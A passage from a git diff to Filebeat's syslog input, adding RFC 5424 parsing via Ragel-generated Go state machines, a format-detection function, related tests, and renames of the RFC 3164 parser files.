st0 + st10: + if (p)++; (p) == (pe) { + goto _test_eof10 + } + st_case_10: + if data[(p)] == 32 { + goto st6 + } + if 48 <= data[(p)] && data[(p)] <= 57 { + goto st11 + } + goto st0 + st11: + if (p)++; (p) == (pe) { + goto _test_eof11 + } + st_case_11: + if data[(p)] == 32 { + goto st6 + } + goto st0 + st12: + if (p)++; (p) == (pe) { + goto _test_eof12 + } + st_case_12: + switch data[(p)] { + case 57: + goto st14 + case 62: + goto st4 + } + if 48 <= data[(p)] && data[(p)] <= 56 { + goto st13 + } + goto st0 + st13: + if (p)++; (p) == (pe) { + goto _test_eof13 + } + st_case_13: + if data[(p)] == 62 { + goto st4 + } + if 48 <= data[(p)] && data[(p)] <= 57 { + goto st3 + } + goto st0 + st14: + if (p)++; (p) == (pe) { + goto _test_eof14 + } + st_case_14: + if data[(p)] == 62 { + goto st4 + } + if 48 <= data[(p)] && data[(p)] <= 49 { + goto st3 + } + goto st0 + st_out: + _test_eof2: + cs = 2 + goto _test_eof + _test_eof3: + cs = 3 + goto _test_eof + _test_eof4: + cs = 4 + goto _test_eof + _test_eof5: + cs = 5 + goto _test_eof + _test_eof6: + cs = 6 + goto _test_eof + _test_eof7: + cs = 7 + goto _test_eof + _test_eof8: + cs = 8 + goto _test_eof + _test_eof9: + cs = 9 + goto _test_eof + _test_eof15: + cs = 15 + goto _test_eof + _test_eof10: + cs = 10 + goto _test_eof + _test_eof11: + cs = 11 + goto _test_eof + _test_eof12: + cs = 12 + goto _test_eof + _test_eof13: + cs = 13 + goto _test_eof + _test_eof14: + cs = 14 + goto _test_eof + + _test_eof: + { + } + _out: + { + } + } + +//line parser/format_check.rl:28 + + return isRFC5424 +} diff --git a/filebeat/input/syslog/format_check_test.go b/filebeat/input/syslog/format_check_test.go new file mode 100644 index 00000000000..d7c14055589 --- /dev/null +++ b/filebeat/input/syslog/format_check_test.go @@ -0,0 +1,33 @@ +// Licensed to Elasticsearch B.V. under one or more contributor +// license agreements. See the NOTICE file distributed with +// this work for additional information regarding copyright +// ownership. Elasticsearch B.V. licenses this file to you under +// the Apache License, Version 2.0 (the "License"); you may +// not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package syslog + +import ( + "testing" + + "gotest.tools/assert" +) + +func TestIsRFC5424(t *testing.T) { + assert.Equal(t, IsRFC5424Format([]byte(RfcDoc65Example1)), true) + assert.Equal(t, IsRFC5424Format([]byte(RfcDoc65Example2)), true) + assert.Equal(t, IsRFC5424Format([]byte(RfcDoc65Example3)), true) + assert.Equal(t, IsRFC5424Format([]byte(RfcDoc65Example4)), true) + assert.Equal(t, IsRFC5424Format([]byte("<190>2018-06-19T02:13:38.635322-0700 super mon message")), false) + assert.Equal(t, IsRFC5424Format([]byte("<190>589265: Feb 8 18:55:31.306: %SEC-11-IPACCESSLOGP: list 177 denied udp 10.0.0.1(53640) -> 10.100.0.1(15600), 1 packet")), false) +} diff --git a/filebeat/input/syslog/input.go b/filebeat/input/syslog/input.go index 7e93ca162e1..ee8f9ab1e30 100644 --- a/filebeat/input/syslog/input.go +++ b/filebeat/input/syslog/input.go @@ -35,8 +35,11 @@ import ( ) // Parser is generated from a ragel state machine using the following command: -//go:generate ragel -Z -G2 parser.rl -o parser.go -//go:generate goimports -l -w parser.go +//go:generate ragel -Z -G2 parser/rfc3164_parser.rl -o rfc3164_parser.go +//go:generate ragel -Z -G2 parser/rfc5424_parser.rl -o rfc5424_parser.go +//go:generate ragel -Z -G2 parser/format_check.rl -o format_check.go +//go:generate goimports -l -w rfc3164_parser.go +//go:generate goimports -l -w rfc5424_parser.go // Severity and Facility are derived from the priority, theses are the human readable terms // defined in https://tools.ietf.org/html/rfc3164#section-4.1.1. @@ -123,11 +126,7 @@ func NewInput( } forwarder := harvester.NewForwarder(out) - cb := func(data []byte, metadata inputsource.NetworkMetadata) { - ev := parseAndCreateEvent(data, metadata, time.Local, log) - forwarder.Send(ev) - } - + cb := GetCbByConfig(config, forwarder, log) server, err := factory(cb, config.Protocol) if err != nil { return nil, err @@ -178,6 +177,35 @@ func (p *Input) Wait() { p.Stop() } +func GetCbByConfig(cfg config, forwarder *harvester.Forwarder, log *logp.Logger) inputsource.NetworkFunc { + switch cfg.Format { + + case syslogFormatRFC5424: + return func(data []byte, metadata inputsource.NetworkMetadata) { + ev := parseAndCreateEvent5424(data, metadata, time.Local, log) + forwarder.Send(ev) + } + + case syslogFormatAuto: + return func(data []byte, metadata inputsource.NetworkMetadata) { + var ev beat.Event + if IsRFC5424Format(data) { + ev = parseAndCreateEvent5424(data, metadata, time.Local, log) + } else { + ev = parseAndCreateEvent3164(data, metadata, time.Local, log) + } + forwarder.Send(ev) + } + case syslogFormatRFC3164: + break + } + + return func(data []byte, metadata inputsource.NetworkMetadata) { + ev := parseAndCreateEvent3164(data, metadata, time.Local, log) + forwarder.Send(ev) + } +} + func createEvent(ev *event, metadata inputsource.NetworkMetadata, timezone *time.Location, log *logp.Logger) beat.Event { f := common.MapStr{ "message": strings.TrimRight(ev.Message(), "\n"), @@ -219,6 +247,27 @@ func createEvent(ev *event, metadata inputsource.NetworkMetadata, timezone *time } } + // RFC5424 + if ev.AppName() != "" { + process["name"] = ev.AppName() + } + + if ev.ProcID() != "" { + process["entity_id"] = ev.ProcID() + } + + if ev.MsgID() != "" { + syslog["msgid"] = ev.MsgID() + } + + if ev.Version() != -1 { + syslog["version"] = ev.Version() + } + + if ev.data != nil && len(ev.data) > 0 { + syslog["data"] = ev.data + } + f["syslog"] = syslog f["event"] = event if len(process) > 0 { @@ -232,9 +281,9 @@ func createEvent(ev *event, metadata inputsource.NetworkMetadata, timezone *time return newBeatEvent(ev.Timestamp(timezone), metadata, f) } -func parseAndCreateEvent(data []byte, metadata inputsource.NetworkMetadata, timezone *time.Location, log *logp.Logger) beat.Event { +func parseAndCreateEvent3164(data []byte, metadata inputsource.NetworkMetadata, timezone *time.Location, log *logp.Logger) beat.Event { ev := newEvent() - Parse(data, ev) + ParserRFC3164(data, ev) if !ev.IsValid() { log.Errorw("can't parse event as syslog rfc3164", "message", string(data)) return newBeatEvent(time.Now(), metadata, common.MapStr{ @@ -244,6 +293,18 @@ func parseAndCreateEvent(data []byte, metadata inputsource.NetworkMetadata, time return createEvent(ev, metadata, time.Local, log) } +func parseAndCreateEvent5424(data []byte, metadata inputsource.NetworkMetadata, timezone *time.Location, log *logp.Logger) beat.Event { + ev := newEvent() + ParserRFC5424(data, ev) + if !ev.IsValid() { + log.Errorw("can't parse event as syslog rfc5424", "message", string(data)) + return newBeatEvent(time.Now(), metadata, common.MapStr{ + "message": string(data), + }) + } + return createEvent(ev, metadata, time.Local, log) +} + func newBeatEvent(timestamp time.Time, metadata inputsource.NetworkMetadata, fields common.MapStr) beat.Event { event := beat.Event{ Timestamp: timestamp, diff --git a/filebeat/input/syslog/input_test.go b/filebeat/input/syslog/input_test.go index 78cd70d8362..23600278672 100644 --- a/filebeat/input/syslog/input_test.go +++ b/filebeat/input/syslog/input_test.go @@ -194,7 +194,7 @@ func TestSequence(t *testing.T) { }) } -func TestParseAndCreateEvent(t *testing.T) { +func TestParseAndCreateEvent3164(t *testing.T) { cases := map[string]struct { data []byte expected common.MapStr @@ -239,7 +239,7 @@ func TestParseAndCreateEvent(t *testing.T) { for title, c := range cases { t.Run(title, func(t *testing.T) { - event := parseAndCreateEvent(c.data, metadata, tz, log) + event := parseAndCreateEvent3164(c.data, metadata, tz, log) assert.Equal(t, c.expected, event.Fields) assert.Equal(t, metadata.Truncated, event.Meta["truncated"]) }) @@ -259,3 +259,92 @@ func dummyMetadata() inputsource.NetworkMetadata { addr := &net.IPAddr{IP: parsedIP, Zone: ""} return inputsource.NetworkMetadata{RemoteAddr: addr} } + +func TestParseAndCreateEvent5424(t *testing.T) { + cases := map[string]struct { + data []byte + expected common.MapStr + }{ + "valid data": { + data: []byte(RfcDoc65Example1), + expected: common.MapStr{ + "event": common.MapStr{"severity": 2}, + "hostname": "mymachine.example.com", + "log": common.MapStr{ + "source": common.MapStr{ + "address": "127.0.0.1", + }, + }, + "process": common.MapStr{ + "name": "su", + "entity_id": "-", + }, + "message": "'su root' failed for lonvick on /dev/pts/8", + "syslog": common.MapStr{ + "facility": 4, + "facility_label": "security/authorization", + "priority": 34, + "severity_label": "Critical", + "msgid": "ID47", + "version": 1, + }, + }, + }, + "valid data2": { + data: []byte(RfcDoc65Example3), + expected: common.MapStr{ + "event": common.MapStr{"severity": 5}, + "hostname": "mymachine.example.com", + "log": common.MapStr{ + "source": common.MapStr{ + "address": "127.0.0.1", + }, + }, + "process": common.MapStr{ + "name": "evntslog", + "entity_id": "-", + }, + "message": "An application event log entry...", + "syslog": common.MapStr{ + "facility": 20, + "facility_label": "local4", + "priority": 165, + "severity_label": "Notice", + "msgid": "ID47", + "version": 1, + "data": EventData{ + "exampleSDID@32473": { + "eventID": "1011", + "eventSource": "Application", + "iut": "3", + }, + }, + }, + }, + }, + + "invalid data": { + data: []byte("<34>Oct 11 22:14:15 mymachine su[230]: 'su root' failed for lonvick on /dev/pts/8"), + expected: common.MapStr{ + "log": common.MapStr{ + "source": common.MapStr{ + "address": "127.0.0.1", + }, + }, + "message": "<34>Oct 11 22:14:15 mymachine su[230]: 'su root' failed for lonvick on /dev/pts/8", + }, + }, + } + + tz := time.Local + log := logp.NewLogger("syslog") + metadata := dummyMetadata() + + for title, c := range cases { + t.Run(title, func(t *testing.T) { + event := parseAndCreateEvent5424(c.data, metadata, tz, log) + assert.Equal(t, c.expected, event.Fields) + assert.Equal(t, metadata.Truncated, event.Meta["truncated"]) + }) + } +} diff --git a/filebeat/input/syslog/parser.rl b/filebeat/input/syslog/parser.rl deleted file mode 100644 index e5b2c1b143f..00000000000 --- a/filebeat/input/syslog/parser.rl +++ /dev/null @@ -1,106 +0,0 @@ -// Code generated by ragel DO NOT EDIT. -package syslog - -%%{ - machine syslog; - write data; - variable p p; - variable pe pe; -}%% - -var ( - noDuplicates = []byte{'-', '.'} -) - -// Parse parses Syslog events. -func Parse(data []byte, event *event) { - var p, cs int - pe := len(data) - tok := 0 - eof := len(data) - %%{ - action tok { - tok = p - } - - action priority { - event.SetPriority(data[tok:p]) - } - - action message { - event.SetMessage(data[tok:p]) - } - - action month { - event.SetMonth(data[tok:p]) - } - - action year{ - event.SetYear(data[tok:p]) - } - - action month_numeric { - event.SetMonthNumeric(data[tok:p]) - } - - action day { - event.SetDay(data[tok:p]) - } - - action hour { - event.SetHour(data[tok:p]) - } - - action minute { - event.SetMinute(data[tok:p]) - } - - action second { - event.SetSecond(data[tok:p]) - } - - action nanosecond{ - event.SetNanosecond(data[tok:p]) - } - - # NOTES: This allow to bail out of obvious non valid - # hostname, this might not be ideal in all situation, but - # when this happen we just go to the catch all case and at least - # extract the message - action lookahead_duplicates{ - if p-1 > 0 { - for _, b := range noDuplicates { - if data[p] == b && data[p-1] == b { - p = tok -1 - fgoto catch_all; - } - } - } - } - - action hostname { - event.SetHostname(data[tok:p]) - } - - action program { - event.SetProgram(data[tok:p]) - } - - action pid { - event.SetPid(data[tok:p]) - } - - action timezone { - event.SetTimeZone(data[tok:p]) - } - - action sequence { - event.SetSequence(data[tok:p]) - } - - include syslog_rfc3164 "syslog_rfc3164.rl"; - - write init; - write exec; - }%% -} diff --git a/filebeat/input/syslog/parser/common.rl b/filebeat/input/syslog/parser/common.rl new file mode 100644 index 00000000000..d36d9e29a75 --- /dev/null +++ b/filebeat/input/syslog/parser/common.rl @@ -0,0 +1,141 @@ +%%{ + machine common; + action tok { + tok = p + } + + action priority { + event.SetPriority(data[tok:p]) + } + + action message { + event.SetMessage(data[tok:p]) + } + + action month { + event.SetMonth(data[tok:p]) + } + + action year{ + event.SetYear(data[tok:p]) + } + + action month_numeric { + event.SetMonthNumeric(data[tok:p]) + } + + action day { + event.SetDay(data[tok:p]) + } + + action hour { + event.SetHour(data[tok:p]) + } + + action minute { + event.SetMinute(data[tok:p]) + } + + action second { + event.SetSecond(data[tok:p]) + } + + action nanosecond{ + event.SetNanosecond(data[tok:p]) + } + + + action init_data{ + event.data = EventData{} + } + + action init_sd_param{ + state.sd_value_bs = []int{} + } + + action set_sd_param_name{ + state.sd_param_name = string(data[tok:p]) + } + + action set_sd_param_value{ + event.SetData(state.sd_id, state.sd_param_name, data, tok, p, state.sd_value_bs) + } + + action set_sd_id{ + state.sd_id = string(data[tok:p]) + if _, ok := event.data[ state.sd_id ]; ok { + fhold; + } else { + event.data[state.sd_id] = map[string]string{} + } + } + + action set_bs{ + state.sd_value_bs = append(state.sd_value_bs, p) + } + # NOTES: This allow to bail out of obvious non valid + # hostname, this might not be ideal in all situation, but + # when this happen we just go to the catch all case and at least + # extract the message + action lookahead_duplicates{ + if p-1 > 0 { + for _, b := range noDuplicates { + if data[p] == b && data[p-1] == b { + p = tok -1 + fgoto catch_all; + } + } + } + } + + action hostname { + event.SetHostname(data[tok:p]) + } + + action program { + event.SetProgram(data[tok:p]) + } + + action pid { + event.SetPid(data[tok:p]) + } + + action timezone { + event.SetTimeZone(data[tok:p]) + } + + action sequence { + event.SetSequence(data[tok:p]) + } + + action version{ + event.SetVersion(data[tok:p]) + } + + action app_name{ + event.SetAppName(data[tok:p]) + } + + action proc_id { + event.SetProcID(data[tok:p]) + } + + action msg_id { + event.SetMsgID(data[tok:p]) + } + + SP = ' '; + + # backslash "\" + BS = 0x5C; + + NIL_VALUE = "-"; + PRINT_US_ASCII = 0x21..0x7E; + NONZERO_DIGIT = [1-9]; + + # OCTET = 0x00..0xFF; + OCTET = any; + BOM = 0xEF 0xBB 0xBF; + UTF_8_STRING = OCTET*; + +}%% diff --git a/filebeat/input/syslog/parser/format_check.rl b/filebeat/input/syslog/parser/format_check.rl new file mode 100644 index 00000000000..4b842918816 --- /dev/null +++ b/filebeat/input/syslog/parser/format_check.rl @@ -0,0 +1,30 @@ +// Code generated by ragel DO NOT EDIT. +package syslog + +%%{ + machine format_check; + write data; + variable p p; + variable pe pe; +}%% + +func IsRFC5424Format(data []byte) bool { + var p, cs int + isRFC5424 := false + pe := len(data) + %%{ + + action set_true { + isRFC5424 = true + } + + include common "common.rl"; + include syslog_rfc5424 "syslog_rfc5424.rl"; + + main := ("<" PRIVAL_RANGE ">" VERSION_RANGE SP digit{4}>set_true) ; + + write init; + write exec; + }%% + return isRFC5424 +} diff --git a/filebeat/input/syslog/parser/rfc3164_parser.rl b/filebeat/input/syslog/parser/rfc3164_parser.rl new file mode 100644 index 00000000000..02054231b65 --- /dev/null +++ b/filebeat/input/syslog/parser/rfc3164_parser.rl @@ -0,0 +1,32 @@ +// Code generated by ragel DO NOT EDIT. +package syslog + +%%{ + machine syslog_rfc3154; + write data; + variable p p; + variable pe pe; +}%% + +var ( + noDuplicates = []byte{'-', '.'} +) + +// Parse parses Syslog events. +func ParserRFC3164(data []byte, event *event) { + var p, cs int + pe := len(data) + tok := 0 + eof := len(data) + %%{ + + include common "common.rl"; + include syslog_rfc3164 "syslog_rfc3164.rl"; + + write init; + write exec; + }%% + +} + + diff --git a/filebeat/input/syslog/parser/rfc5424_parser.rl b/filebeat/input/syslog/parser/rfc5424_parser.rl new file mode 100644 index 00000000000..31605e27d16 --- /dev/null +++ b/filebeat/input/syslog/parser/rfc5424_parser.rl @@ -0,0 +1,36 @@ +// Code generated by ragel DO NOT EDIT. +package syslog + +%%{ + machine syslog_rfc5424; + write data; + variable p p; + variable pe pe; +}%% + +type machineState struct { + sd_id string + sd_param_name string + sd_value_bs []int +} + +func ParserRFC5424(data []byte, event *event) { + var p, cs int + state := machineState{ + sd_value_bs : []int{}, + } + pe := len(data) + tok := 0 + eof := len(data) + %%{ + + + include common "common.rl"; + include syslog_rfc5424 "syslog_rfc5424.rl"; + + main := HEADER SP STRUCTURED_DATA (SP MSG)?; + + write init; + write exec; + }%% +} diff --git a/filebeat/input/syslog/syslog_rfc3164.rl b/filebeat/input/syslog/parser/syslog_rfc3164.rl similarity index 100% rename from filebeat/input/syslog/syslog_rfc3164.rl rename to filebeat/input/syslog/parser/syslog_rfc3164.rl diff --git a/filebeat/input/syslog/parser/syslog_rfc5424.rl b/filebeat/input/syslog/parser/syslog_rfc5424.rl new file mode 100644 index 00000000000..b72e3bc78f7 --- /dev/null +++ b/filebeat/input/syslog/parser/syslog_rfc5424.rl @@ -0,0 +1,63 @@ +%%{ + machine syslog_rfc5424; + + # Syslog Message Format + # https://tools.ietf.org/html/rfc5424#section-6 + + # PRI: range 0 .. 191 + PRIVAL_RANGE = (('1' ('9' ('0' | '1'){,1} + | '0'..'8' ('0'..'9'){,1}){,1}) + | ('2'..'9' ('0'..'9'){,1}) + | ('0')); + PRIVAL = PRIVAL_RANGE >tok %priority; + PRI = "<" PRIVAL ">"; + + VERSION_RANGE = (NONZERO_DIGIT digit{0,2}); + VERSION = VERSION_RANGE>tok %version; + + # timestamp + DATE_FULLYEAR = digit{4}>tok %year; + DATE_MONTH = (("0"[1-9]) | ("1"[0-2]))>tok %month_numeric; + DATE_MDAY = (([12][0-9]) | ("3"[01]))>tok %day; + FULL_DATE = DATE_FULLYEAR "-" DATE_MONTH "-" DATE_MDAY; + + TIME_HOUR = ([01][0-9] | "2"[0-3])>tok %hour; + TIME_MINUTE = ([0-5][0-9])>tok %minute; + TIME_SECOND = ([0-5][0-9])>tok %second; + TIME_SECFRAC = '.' digit{1,6}>tok %nanosecond; + TIME_NUMOFFSET = ('+' | '-') ([0-5][0-9]) ':' ([0-5][0-9]); + TIME_OFFSET = 'Z' | TIME_NUMOFFSET >tok %timezone; + PARTIAL_TIME = TIME_HOUR ":" TIME_MINUTE ":" TIME_SECOND TIME_SECFRAC?; + FULL_TIME = PARTIAL_TIME TIME_OFFSET; + + TIMESTAMP = NIL_VALUE | (FULL_DATE "T" FULL_TIME); + + HOSTNAME = NIL_VALUE | PRINT_US_ASCII{1,255} >tok %hostname; + APP_NAME = NIL_VALUE | PRINT_US_ASCII{1,48} >tok %app_name; + PROCID = NIL_VALUE | PRINT_US_ASCII{1,128} >tok %proc_id; + MSGID = NIL_VALUE | PRINT_US_ASCII{1,32} >tok %msg_id; + + HEADER = PRI VERSION SP TIMESTAMP SP HOSTNAME + SP APP_NAME SP PROCID SP MSGID; + + + # + + escapes_char = ('"' | "]" | BS); + param_value_escapes = (BS>set_bs escapes_char); + SD_NAME = (PRINT_US_ASCII - ('=' | SP | ']' | '"')){1,32}; + + SD_ID = SD_NAME >tok %set_sd_id; + PARAM_NAME = SD_NAME >tok %set_sd_param_name; + PARAM_VALUE = ((OCTET - escapes_char) | param_value_escapes)+ >tok %set_sd_param_value; + SD_PARAM = PARAM_NAME "=" '"' PARAM_VALUE '"' >init_sd_param; + SD_ELEMENT = "[" SD_ID (SP SD_PARAM+)* "]"; + STRUCTURED_DATA = NIL_VALUE | SD_ELEMENT+ >init_data; + + MSG = OCTET* >tok %message; + + + + + +}%% diff --git a/filebeat/input/syslog/parser.go b/filebeat/input/syslog/rfc3164_parser.go similarity index 88% rename from filebeat/input/syslog/parser.go rename to filebeat/input/syslog/rfc3164_parser.go index 4e5c38b8a45..21f1747f5d1 100644 --- a/filebeat/input/syslog/parser.go +++ b/filebeat/input/syslog/rfc3164_parser.go @@ -15,37 +15,37 @@ // specific language governing permissions and limitations // under the License. -//line parser.rl:1 +//line parser/rfc3164_parser.rl:1 // Code generated by ragel DO NOT EDIT. package syslog -//line parser.go:8 -const syslog_start int = 0 -const syslog_first_final int = 2 -const syslog_error int = -1 +//line rfc3164_parser.go:8 +const syslog_rfc3154_start int = 0 +const syslog_rfc3154_first_final int = 2 +const syslog_rfc3154_error int = -1 -const syslog_en_main int = 0 -const syslog_en_catch_all int = 1 +const syslog_rfc3154_en_main int = 0 +const syslog_rfc3154_en_catch_all int = 1 -//line parser.rl:9 +//line parser/rfc3164_parser.rl:9 var ( noDuplicates = []byte{'-', '.'} ) // Parse parses Syslog events. -func Parse(data []byte, event *event) { +func ParserRFC3164(data []byte, event *event) { var p, cs int pe := len(data) tok := 0 eof := len(data) -//line parser.go:31 +//line rfc3164_parser.go:31 { - cs = syslog_start + cs = syslog_rfc3154_start } -//line parser.go:36 +//line rfc3164_parser.go:36 { if (p) == (pe) { goto _test_eof @@ -329,17 +329,17 @@ func Parse(data []byte, event *event) { } goto tr0 tr0: -//line parser.rl:22 +//line parser/common.rl:3 tok = p goto st2 tr133: -//line parser.rl:97 +//line parser/common.rl:107 event.SetSequence(data[tok:p]) -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -349,20 +349,20 @@ func Parse(data []byte, event *event) { goto _test_eof2 } st_case_2: -//line parser.go:340 +//line rfc3164_parser.go:340 goto st2 tr1: -//line parser.rl:22 +//line parser/common.rl:3 tok = p goto st3 tr134: -//line parser.rl:97 +//line parser/common.rl:107 event.SetSequence(data[tok:p]) -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -372,7 +372,7 @@ func Parse(data []byte, event *event) { goto _test_eof3 } st_case_3: -//line parser.go:363 +//line rfc3164_parser.go:363 switch data[(p)] { case 65: goto tr4 @@ -396,17 +396,17 @@ func Parse(data []byte, event *event) { } goto st2 tr14: -//line parser.rl:22 +//line parser/common.rl:3 tok = p goto st4 tr135: -//line parser.rl:97 +//line parser/common.rl:107 event.SetSequence(data[tok:p]) -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -416,7 +416,7 @@ func Parse(data []byte, event *event) { goto _test_eof4 } st_case_4: -//line parser.go:407 +//line rfc3164_parser.go:407 if 48 <= data[(p)] && data[(p)] <= 57 { goto st5 } @@ -449,7 +449,7 @@ func Parse(data []byte, event *event) { } goto st2 tr18: -//line parser.rl:38 +//line parser/common.rl:19 event.SetYear(data[tok:p]) @@ -459,13 +459,13 @@ func Parse(data []byte, event *event) { goto _test_eof8 } st_case_8: -//line parser.go:450 +//line rfc3164_parser.go:450 if 48 <= data[(p)] && data[(p)] <= 57 { goto tr19 } goto st2 tr19: -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -475,7 +475,7 @@ func Parse(data []byte, event *event) { goto _test_eof9 } st_case_9: -//line parser.go:466 +//line rfc3164_parser.go:466 if 48 <= data[(p)] && data[(p)] <= 57 { goto st10 } @@ -490,7 +490,7 @@ func Parse(data []byte, event *event) { } goto st2 tr21: -//line parser.rl:42 +//line parser/common.rl:23 event.SetMonthNumeric(data[tok:p]) @@ -500,13 +500,13 @@ func Parse(data []byte, event *event) { goto _test_eof11 } st_case_11: -//line parser.go:491 +//line rfc3164_parser.go:491 if 48 <= data[(p)] && data[(p)] <= 51 { goto tr22 } goto st2 tr22: -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -516,7 +516,7 @@ func Parse(data []byte, event *event) { goto _test_eof12 } st_case_12: -//line parser.go:507 +//line rfc3164_parser.go:507 if 48 <= data[(p)] && data[(p)] <= 57 { goto st13 } @@ -539,7 +539,7 @@ func Parse(data []byte, event *event) { } goto st2 tr24: -//line parser.rl:46 +//line parser/common.rl:27 event.SetDay(data[tok:p]) @@ -549,7 +549,7 @@ func Parse(data []byte, event *event) { goto _test_eof14 } st_case_14: -//line parser.go:540 +//line rfc3164_parser.go:540 if data[(p)] == 50 { goto tr26 } @@ -558,7 +558,7 @@ func Parse(data []byte, event *event) { } goto st2 tr25: -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -568,7 +568,7 @@ func Parse(data []byte, event *event) { goto _test_eof15 } st_case_15: -//line parser.go:559 +//line rfc3164_parser.go:559 if 48 <= data[(p)] && data[(p)] <= 57 { goto st16 } @@ -583,7 +583,7 @@ func Parse(data []byte, event *event) { } goto st2 tr28: -//line parser.rl:50 +//line parser/common.rl:31 event.SetHour(data[tok:p]) @@ -593,13 +593,13 @@ func Parse(data []byte, event *event) { goto _test_eof17 } st_case_17: -//line parser.go:584 +//line rfc3164_parser.go:584 if 48 <= data[(p)] && data[(p)] <= 53 { goto tr29 } goto st2 tr29: -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -609,7 +609,7 @@ func Parse(data []byte, event *event) { goto _test_eof18 } st_case_18: -//line parser.go:600 +//line rfc3164_parser.go:600 if 48 <= data[(p)] && data[(p)] <= 57 { goto st19 } @@ -624,7 +624,7 @@ func Parse(data []byte, event *event) { } goto st2 tr31: -//line parser.rl:54 +//line parser/common.rl:35 event.SetMinute(data[tok:p]) @@ -634,13 +634,13 @@ func Parse(data []byte, event *event) { goto _test_eof20 } st_case_20: -//line parser.go:625 +//line rfc3164_parser.go:625 if 48 <= data[(p)] && data[(p)] <= 53 { goto tr32 } goto st2 tr32: -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -650,7 +650,7 @@ func Parse(data []byte, event *event) { goto _test_eof21 } st_case_21: -//line parser.go:641 +//line rfc3164_parser.go:641 if 48 <= data[(p)] && data[(p)] <= 57 { goto st22 } @@ -681,19 +681,19 @@ func Parse(data []byte, event *event) { } goto st2 tr34: -//line parser.rl:58 +//line parser/common.rl:39 event.SetSecond(data[tok:p]) goto st23 tr61: -//line parser.rl:93 +//line parser/common.rl:103 event.SetTimeZone(data[tok:p]) goto st23 tr68: -//line parser.rl:62 +//line parser/common.rl:43 event.SetNanosecond(data[tok:p]) @@ -703,7 +703,7 @@ func Parse(data []byte, event *event) { goto _test_eof23 } st_case_23: -//line parser.go:694 +//line rfc3164_parser.go:694 switch data[(p)] { case 58: goto tr41 @@ -729,11 +729,11 @@ func Parse(data []byte, event *event) { } goto tr0 tr39: -//line parser.rl:22 +//line parser/common.rl:3 tok = p -//line parser.rl:70 +//line parser/common.rl:80 if p-1 > 0 { for _, b := range noDuplicates { @@ -748,7 +748,7 @@ func Parse(data []byte, event *event) { goto st24 tr42: -//line parser.rl:70 +//line parser/common.rl:80 if p-1 > 0 { for _, b := range noDuplicates { @@ -767,7 +767,7 @@ func Parse(data []byte, event *event) { goto _test_eof24 } st_case_24: -//line parser.go:754 +//line rfc3164_parser.go:754 switch data[(p)] { case 58: goto tr44 @@ -793,11 +793,11 @@ func Parse(data []byte, event *event) { } goto st2 tr40: -//line parser.rl:22 +//line parser/common.rl:3 tok = p -//line parser.rl:70 +//line parser/common.rl:80 if p-1 > 0 { for _, b := range noDuplicates { @@ -812,7 +812,7 @@ func Parse(data []byte, event *event) { goto st25 tr43: -//line parser.rl:70 +//line parser/common.rl:80 if p-1 > 0 { for _, b := range noDuplicates { @@ -831,7 +831,7 @@ func Parse(data []byte, event *event) { goto _test_eof25 } st_case_25: -//line parser.go:814 +//line rfc3164_parser.go:814 switch data[(p)] { case 32: goto tr45 @@ -864,7 +864,7 @@ func Parse(data []byte, event *event) { } goto st2 tr45: -//line parser.rl:81 +//line parser/common.rl:91 event.SetHostname(data[tok:p]) @@ -874,7 +874,7 @@ func Parse(data []byte, event *event) { goto _test_eof26 } st_case_26: -//line parser.go:857 +//line rfc3164_parser.go:857 switch data[(p)] { case 32: goto tr0 @@ -888,7 +888,7 @@ func Parse(data []byte, event *event) { } goto tr47 tr47: -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -898,7 +898,7 @@ func Parse(data []byte, event *event) { goto _test_eof27 } st_case_27: -//line parser.go:881 +//line rfc3164_parser.go:881 switch data[(p)] { case 32: goto st2 @@ -914,7 +914,7 @@ func Parse(data []byte, event *event) { } goto st27 tr49: -//line parser.rl:85 +//line parser/common.rl:95 event.SetProgram(data[tok:p]) @@ -924,7 +924,7 @@ func Parse(data []byte, event *event) { goto _test_eof28 } st_case_28: -//line parser.go:907 +//line rfc3164_parser.go:907 switch data[(p)] { case 32: goto st29 @@ -946,7 +946,7 @@ func Parse(data []byte, event *event) { st_case_29: goto tr0 tr50: -//line parser.rl:85 +//line parser/common.rl:95 event.SetProgram(data[tok:p]) @@ -956,13 +956,13 @@ func Parse(data []byte, event *event) { goto _test_eof30 } st_case_30: -//line parser.go:939 +//line rfc3164_parser.go:939 if 48 <= data[(p)] && data[(p)] <= 57 { goto tr52 } goto st2 tr52: -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -972,7 +972,7 @@ func Parse(data []byte, event *event) { goto _test_eof31 } st_case_31: -//line parser.go:955 +//line rfc3164_parser.go:955 if data[(p)] == 93 { goto tr54 } @@ -981,7 +981,7 @@ func Parse(data []byte, event *event) { } goto st2 tr54: -//line parser.rl:89 +//line parser/common.rl:99 event.SetPid(data[tok:p]) @@ -991,7 +991,7 @@ func Parse(data []byte, event *event) { goto _test_eof32 } st_case_32: -//line parser.go:974 +//line rfc3164_parser.go:974 if data[(p)] == 58 { goto st33 } @@ -1009,7 +1009,7 @@ func Parse(data []byte, event *event) { } goto st2 tr46: -//line parser.rl:70 +//line parser/common.rl:80 if p-1 > 0 { for _, b := range noDuplicates { @@ -1022,7 +1022,7 @@ func Parse(data []byte, event *event) { } } -//line parser.rl:81 +//line parser/common.rl:91 event.SetHostname(data[tok:p]) @@ -1032,7 +1032,7 @@ func Parse(data []byte, event *event) { goto _test_eof34 } st_case_34: -//line parser.go:1013 +//line rfc3164_parser.go:1013 switch data[(p)] { case 32: goto st26 @@ -1065,7 +1065,7 @@ func Parse(data []byte, event *event) { } goto st2 tr57: -//line parser.rl:70 +//line parser/common.rl:80 if p-1 > 0 { for _, b := range noDuplicates { @@ -1080,7 +1080,7 @@ func Parse(data []byte, event *event) { goto st35 tr58: -//line parser.rl:70 +//line parser/common.rl:80 if p-1 > 0 { for _, b := range noDuplicates { @@ -1093,7 +1093,7 @@ func 